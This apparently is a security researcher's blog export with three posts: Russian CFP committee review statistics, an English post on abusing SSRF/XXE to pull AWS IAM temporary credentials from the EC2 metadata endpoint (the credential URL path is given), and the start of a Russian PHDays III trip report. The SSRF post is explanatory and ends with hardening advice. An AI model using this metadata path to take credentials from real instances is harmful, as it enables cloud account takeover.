vuOfvt+YLPca5bt04tWrTQ9OnT7ec4zadCzWyo+Qzo6tWrlZGRofHjx9vPdD700ENatWqVBVy+fLmdLS2pnby8PL322mv2fCdPntQtt9xi26lVq5b9Pn3hdjp37nzOfc1jB2wIIHC2AKGUqwKBaiBgwp+ZWTWzqmZRUEZyho4fOG6Da/KWZBsOc0/mKjc7t2hgLeO7y12BLrnquOzMp1kFb2Zq6zerr6DwIJnFW2b208x8mt+zIeAJgXOF0qNHj+rRRx9Vy5YtdffddyszM9MGTxMqhw8frv3799ugaL4Zb54VNbfnBw8ebJ9B3bt3ryZNmqQ5c+bokksu0Z133mm/PW+ONYG1pHbMIwPmO/dz585VUFCQnnjiCbVr186G2+I17tixo8R9PWFEmwj4ugCh1NdHkPoRKI9AnpSblau87DwbJM3jAfl5+f8Nqn6Sn7+fvb1uAq5/oL9ctVySf3lOwr4IuF+gpIVON910kw2Z9evXV2JiombNmqV58+YpPDzcLlyaPXu2IiIi1LNnT/vcqQmTJkQWDpCtWrUqEkpLaycmJsaG1wkTJtg2Q0NDz3S2eCg1i7JK2tf9QrSIgO8LEEp9fwzpAQIIIFDtBcryvOa2bdvs7fTim5lFNav0TUA0M6PR0dGlhtLS2jEzqAkJCVq4cKHMTGhsbKymTZtm/yxeo7nVX9K+1X7A6CACFRAglFYAjUMQQAABBKpWoCyhtPgMZ+EKze36sobS0top3Ka5zb9ixQrFx8dr/vz5Mq+DKvwYQGn7mudf2RBAoKgAoZQrAgEEEEDA6wXKEkqLPwuakpKiqVOn2tlTc4u+pFDatm1bu1hp1KhR6tu371nPlBZuxzybunbtWs2cOdMurNq4caNWrlxpny3Nyckp0s5HH31U4r7meVQ2BBAglHINIIAAAgj4mEBZQqnp0qFDh+zCpg0bNigsLExjxozRyJEjlZSUVGIoNavkze14M9tpXi81cODAEtsxs6HLli2zC5hMTWY1/4wZMxQVFWVnSgu3ExcXV+K+PsZPuQhUiQAzpVXCzEkQQAABBBBAAAEEShMglHJ9IIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCByAX5kAAAFhklEQVSAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEECKVcAwgggAACCCCAAAKOCxBKHR8CCkAAAQQQQAABBBAglHINIIAAAggggAACCDguQCh1fAgoAAEEEEAAAQQQQIBQyjWAAAIIIIAAAggg4LgAodTxIaAABBBAAAEEEEAAAUIp1wACCCCAAAIIIICA4wKEUseHgAIQQAABBBBAAAEE/g9Wjxy5Ws9HXgAAAABJRU5ErkJggg==" /><br />
<br />
Очень радует разносторонность интересов наших участников CFP.<br />
<br />
Ну и немного про нас- людей комиссии. Я заметил довольно интересную тенденцию: между интересами и работой человека, его характером и тем, как он работает на CFP, определенно прослеживается связь. Мне кажется это довольно интересным. Наш CFP трудно назвать беспристрастным, хоть мы и стараемся. Дело в том, что в комиссии собрались люди из разных областей ИБ (кроме бумажников, если не считать таким toxa), поэтому частенько кто-то пытается быть адвокатом, кто-то прокурором, и хочет убедить других участников в правильности своего решения. Я знаю, что Андрей Петухов не поддерживает такой подход, но мне нравится, что решает коммунити, а не только сухая статистика, и у каждого есть шанс поговорить с другим участником и разобраться в вопросе. Как правило, выходит, что комиссия CFP может выслать комментарии или вопросы с уточнением или даже пожелания для докладчика. Короче, вот вам статистика по тем, кто самый "злой" и "добрый", основанная на финальных оценках CFP:<br />
<br />
<br />
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: 1px solid #ccc; font-family: arial,sans,sans-serif; font-size: 13px; table-layout: fixed;"><colgroup><col width="133"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col></colgroup><tbody>
<tr style="height: 21px;"><td style="border-right: 1px solid #000000; padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"Alexey Sintsov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexey Sintsov</td><td data-sheets-value="[null,2,"Alexandr Polyakov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexandr Polyakov</td><td data-sheets-value="[null,2,"D1g1"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">D1g1</td><td data-sheets-value="[null,2,"Nikita Abdullin"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Nikita Abdullin</td><td data-sheets-value="[null,2,"Stepan Ilyin"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Stepan Ilyin</td><td data-sheets-value="[null,2,"Cr4sh"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Cr4sh</td><td data-sheets-value="[null,2,"Alexander Bazhanyuk"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexander Bazhanyuk</td><td data-sheets-value="[null,2,"Alexander Matrosov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexander Matrosov</td><td data-sheets-value="[null,2,"Andrey Petukhov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Andrey Petukhov</td><td data-sheets-value="[null,2,"toxa"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">toxa</td><td data-sheets-value="[null,2,"d0znpp"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">d0znpp</td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"\u0412\u0421\u0415\u0413\u041e"]" style="padding: 2px 3px 2px 3px; vertical-align: bottom;">ВСЕГО</td><td data-sheets-value="[null,3,null,33]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">33</td><td data-sheets-value="[null,3,null,18]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">18</td><td data-sheets-value="[null,3,null,30]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">30</td><td data-sheets-value="[null,3,null,50]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">50</td><td data-sheets-value="[null,3,null,7]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">7</td><td data-sheets-value="[null,3,null,53]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">53</td><td data-sheets-value="[null,3,null,15]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">15</td><td data-sheets-value="[null,3,null,54]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">54</td><td data-sheets-value="[null,3,null,45]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">45</td><td data-sheets-value="[null,3,null,4]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">4</td><td data-sheets-value="[null,3,null,41]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">41</td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"\u041f\u041e\u041b\u041e\u0416"]" style="padding: 2px 3px 2px 3px; vertical-align: bottom;"><h3>
<span style="color: lime;"> <b>+</b></span></h3>
</td><td data-sheets-value="[null,3,null,25]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">25</td><td data-sheets-value="[null,3,null,6]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">6</td><td data-sheets-value="[null,3,null,26]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">26</td><td data-sheets-value="[null,3,null,26]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">26</td><td data-sheets-value="[null,3,null,4]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">4</td><td data-sheets-value="[null,3,null,23]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">23</td><td data-sheets-value="[null,3,null,8]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">8</td><td data-sheets-value="[null,3,null,35]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">35</td><td data-sheets-value="[null,3,null,24]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">24</td><td data-sheets-value="[null,3,null,2]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">2</td><td data-sheets-value="[null,3,null,18]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">18</td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"\u041d\u0415\u0413\u0410\u0422\u0418\u0412"]" style="padding: 2px 3px 2px 3px; vertical-align: bottom;"><h3>
<span style="color: red;">-</span></h3>
</td><td data-sheets-value="[null,3,null,8]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">8</td><td data-sheets-value="[null,3,null,13]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">13</td><td data-sheets-value="[null,3,null,4]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">4</td><td data-sheets-value="[null,3,null,24]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">24</td><td data-sheets-value="[null,3,null,3]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">3</td><td data-sheets-value="[null,3,null,30]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">30</td><td data-sheets-value="[null,3,null,7]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">7</td><td data-sheets-value="[null,3,null,19]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">19</td><td data-sheets-value="[null,3,null,21]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">21</td><td data-sheets-value="[null,3,null,2]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">2</td><td data-sheets-value="[null,3,null,23]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">23</td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;">Коэф. добра</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.7575757575757576]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,76</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.3333333333333333]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,33</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.8666666666666667]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,87</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.52]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,52</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5714285714285714]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,57</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.4339622641509434]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,43</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5333333333333333]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,53</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.6481481481481481]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,65</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5333333333333333]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,53</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,50</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.43902439024390244]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,44</td></tr>
</tbody></table>
<br />
<br />
Вот не думал, что D1g1 самый добрый!<br />
<br />
Всем добра, ребята и спасибо CFP комиссии за их вклад в дело 8)</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-52664864258055467502014-08-08T06:15:00.004-07:002014-08-09T03:18:15.287-07:00SSRF vs AWS Security<div dir="ltr" style="text-align: left;" trbidi="on">
Hello everyone... <br />
<br />
Just want to mention one attack-vector that is useful against AWS EC2 instances in some configurations. It is not rocket-science, but pretty fun and tell us about AWS Cloud security things and maybe can help us to do hardening. Actually I am talking about boring-sold SSRF vector. So if an attacker can do SSRF in our EC2 with SSRF what he can do?<br />
<br />
Sometimes developers like to assign IAM Roles to instances. For example if it is deploy/build server, that needs to create new apps in AWS account or something else, doesn't matter - this just happens 8) And assigning roles to EC2 instances - easiest way you can do it, because you do not need to think about how to deliver Access Keys to the instance, how to rotate them and etc. Now back to SSRF...<br />
<br />
So we have classic vulnerable App with boring XXE:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKQjxGgmTsJ6sCPISgYDePSK2Calzn6xE0j81BDxKL7Ss0vlHsGPljbJjGjgV8y1DTKIxIK6GOR3bMsbBInBeC8xq3T6g1ncORnm2C-h93cTa6Pj7CrYVxEOD6G3NKyr8jWLrZSek8KX3o/s1600/AWS-XXE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKQjxGgmTsJ6sCPISgYDePSK2Calzn6xE0j81BDxKL7Ss0vlHsGPljbJjGjgV8y1DTKIxIK6GOR3bMsbBInBeC8xq3T6g1ncORnm2C-h93cTa6Pj7CrYVxEOD6G3NKyr8jWLrZSek8KX3o/s1600/AWS-XXE.png" height="175" width="400" /></a></div>
<br />
And...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbekaBXuGri5vKlsAJ8vet4GmomjDS7KRYLdDuBFFDISaMKx5YDPieyiUHXFv8G75W4qilS3f3dunJm7L0YJ8kkAei3wO9vqZFVodVy-w6xjVdoPc9Pdi_mmhSHo3egmM-uoedAlyHI10c/s1600/AWS-XXE-CLASSIC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbekaBXuGri5vKlsAJ8vet4GmomjDS7KRYLdDuBFFDISaMKx5YDPieyiUHXFv8G75W4qilS3f3dunJm7L0YJ8kkAei3wO9vqZFVodVy-w6xjVdoPc9Pdi_mmhSHo3egmM-uoedAlyHI10c/s1600/AWS-XXE-CLASSIC.png" height="191" width="400" /></a></div>
<br />
<br />
<a name='more'></a><br />
<br />
Now it's time to remember about AWS meta-data service which is available from any instance. This server return meta-data for EC2 instance that called this API: http://169.254.169.254/latest/meta-data<br />
Let's try:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgse_SdYRuTiiqbfGQLxmsORI3vEv5552mGrenvN9hWmkpYmRrKZWgCN50y1n2j4GbTDlziM8nV-wupj-z9diMW7zM3scoQfUkeCUMNNq8onNtLRoRpOYzcQ4Q_N7aIjO_qFHfjSb6Yb0dc/s1600/AWS-XXE-API.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgse_SdYRuTiiqbfGQLxmsORI3vEv5552mGrenvN9hWmkpYmRrKZWgCN50y1n2j4GbTDlziM8nV-wupj-z9diMW7zM3scoQfUkeCUMNNq8onNtLRoRpOYzcQ4Q_N7aIjO_qFHfjSb6Yb0dc/s1600/AWS-XXE-API.png" height="171" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="text-align: left;">Ok... so now you can get a lot of information... but the funniest part - Temporary Access Key and Token for AWS API is also here http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>...</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYxeLeadNfxGTNfePx3BPDCsjprCfmUEHUtrlDmMBQXm-U9ebZDVAJFoFYhdcGB_bf_rz_ZXiNhntn5QqYryJcmvidhFTTafsK8n4KqKx_FcXfxCF1TsEzkbIxq2HoLOxQUSfAh8a5O8B4/s1600/AWS-XXE-KEY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYxeLeadNfxGTNfePx3BPDCsjprCfmUEHUtrlDmMBQXm-U9ebZDVAJFoFYhdcGB_bf_rz_ZXiNhntn5QqYryJcmvidhFTTafsK8n4KqKx_FcXfxCF1TsEzkbIxq2HoLOxQUSfAh8a5O8B4/s1600/AWS-XXE-KEY.png" height="253" width="400" /></a></div>
<br />
<br />
Wow, 'apache' user got this key... and if you think that by default access with this key limited only from EC2 instance - you wrong. Please feel free to copy this key and use it from any place.<br />
<br />
Config:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTnYuAKxmSSA6tgXDuwaxaz4ihC7fSydE887v-LkzeLSE56CQimxeNvp-SwAoqvhifxEKOWO-tOxXL6kbeYvPazlVmI1rIvhYsPa4fOAYDUGplSkJdp3n2tmQC0Nh2sgEc45I5TKWlajew/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTnYuAKxmSSA6tgXDuwaxaz4ihC7fSydE887v-LkzeLSE56CQimxeNvp-SwAoqvhifxEKOWO-tOxXL6kbeYvPazlVmI1rIvhYsPa4fOAYDUGplSkJdp3n2tmQC0Nh2sgEc45I5TKWlajew/s1600/screenshot2.png" height="83" width="640" /></a></div>
<br />
<br />
Trying:<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzyRwpfOYOKWrFI0vuU4fGk1QH-1xClU5Jpw0FFMkBEuJ9FVi57DhRUJsbmgJcceRZWFyxA2Qr3g_Qe1Gnsxq0Kx28ef9bxXn2jOYhyphenhyphenToxrcHI1c_7DRZAQpem4xBldYFzD82ke2hsmJV/s1600/screenshot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzyRwpfOYOKWrFI0vuU4fGk1QH-1xClU5Jpw0FFMkBEuJ9FVi57DhRUJsbmgJcceRZWFyxA2Qr3g_Qe1Gnsxq0Kx28ef9bxXn2jOYhyphenhyphenToxrcHI1c_7DRZAQpem4xBldYFzD82ke2hsmJV/s1600/screenshot.png" height="259" width="640" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now we can do anything that allowed by Policy/Role that assigned to hacked instance.<br />
<br />
Let's summarize problems:<br />
<br />
1) Anyone can get Access Key: nobody, root, apache... it's not based on OS security.<br />
2) By default this Key works from any IP, not only from instance (but you can try to configure it in Policy at least)<br />
3) You can't revoke this Key. You can remove Policy from the group - yes.<br />
4) You do SSRF in your code, smart-ass!<br />
<br />
So this is just example how SSRF + lack of hardening on AWS account can ruin you life...<br />
<br />
<br />
<br />
Solution for item 2, edit Policies that assigned to Role:<br />
<br />
"Condition": {<br />
"IpAddress": {<br />
"aws:SourceIp": "10.90.X.X"<br />
}<br />
}
<br />
<br />
Then you safe:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBgdN19Snh2AKDZia6_TvZowwp_YWjg4KTa5eCCzxnDP5SX8F-ep-IbhMFYk3g1ZQPw2cu_Yt4-1S52c6F2cM7FdHEjLe_ZXpZptsbJ6zM_DXEV_uq9qZSwiuaX_NTyGNoCqd1EpFmb5j/s1600/screenshot3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBgdN19Snh2AKDZia6_TvZowwp_YWjg4KTa5eCCzxnDP5SX8F-ep-IbhMFYk3g1ZQPw2cu_Yt4-1S52c6F2cM7FdHEjLe_ZXpZptsbJ6zM_DXEV_uq9qZSwiuaX_NTyGNoCqd1EpFmb5j/s1600/screenshot3.png" height="47" width="400" /></a></div>
<br />
But in fact not - if box compromised or with the saem SSRF you can makes RESP API calls from the pwned isntance...<br />
<br />
As final notes:<br />
<br />
1) Check roles that assigned to instances. Less privileges... Better no roles...<br />
2) If you can limit access for this policy by SRC IP - do it, so only instances with this Role can access API.<br />
BUT remember, if you have SSRF, than attacker can do API calls from tsame instance by same SSRF...<br />
3) Do not code SSRF ;)<br />
<br />
P.S. Thanks to Erian Nader from HERE Security team for helping with this material...<br />
<br />
P.P.S. And of course, it's not about only SSRF - if instance pwned, then same risks applied. So be careful with Instance's roles!<br />
<br /></div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com24tag:blogger.com,1999:blog-4711612808026791519.post-84451300524224861942013-06-07T16:09:00.001-07:002013-06-07T16:14:53.092-07:00PHDays III<div dir="ltr" style="text-align: left;" trbidi="on">
Дошли и мои руки, наконец-то, до разбора данного события. Я уже не торт и много печатать не буду, но все же поделюсь впечатлениями.<br />
<br />
<b>Stage 0.</b><br />
<div>
<br /></div>
<div style="text-align: justify;">
Летел я из Берлина, что забавно с рюкзаком PHDays 2012, и что еще более забавно в самолете оказались еще парни, которые так же выдвигались на данный ивент - Йохан, Даниель (создатели SCADA and Computer Security Group - SCADACS) и Джефф Кац aka aestetix. То есть нас всех засадили в один самолет - это мило. И сидели мы относительно рядом 8) И что примечательно, обратно мы тож летели вместе. Так вот я и познакомился с этими милыми мужиками. </div>
<div style="text-align: justify;">
<br />
<br />
<a name='more'></a><br /><br />
<br /></div>
<div>
<div style="text-align: justify;">
Посадка прошла не очень, самолет три раза пытался сеть во Внуково, но три раза за 100-200 метров давал "форсаж" и уходил на след. заход. Туман, Москва... и летчики жаловались на что-то не работающее, не шибко важно, но нужное именно сейчас для посадки в таких условиях. Короче впечатления не самые приятные, но зато есть что в блог написать 8) В итоге капитан принял решение лететь в Домодедово, где благополучно и сели. Радостный Джефф сказал, что щас нас встретят... но я его разочаровал, сказав что аэропорт-то не тот. Йохан и Даниель стали ждать, когда орги вышлют такси за ними, а Джефф решил присоединится ко мне - Аероэкспресс, Метро, небольшая прогулка (15-20 мин) в сторону отеля. Так мы и дошли. </div>
<br />
<br />
